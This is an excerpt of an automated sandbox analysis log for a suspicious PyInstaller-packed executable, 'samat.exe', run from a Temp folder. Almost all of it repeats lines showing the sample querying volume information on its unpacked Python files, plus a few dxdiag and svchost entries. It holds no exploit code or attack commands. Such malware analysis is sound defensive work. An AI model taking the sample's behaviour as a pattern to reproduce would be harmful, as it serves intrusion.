Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\_ctypes.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\_bz2.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\_lzma.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pyexpat.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\_queue.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\_hashlib.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\_socket.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\_ssl.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\jaraco\text\Lorem ipsum.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md.cp313-win_amd64.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md__mypyc.cp313-win_amd64.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Windows\System32\dxdiag.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0516~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\dxdiag.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0110~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (repeated 2 times)
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation (repeated 6 times)
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation (repeated 4 times)
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation (repeated 3 times)
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation (repeated 2 times)
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12CD010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 7_2_00007FF7E12CD010
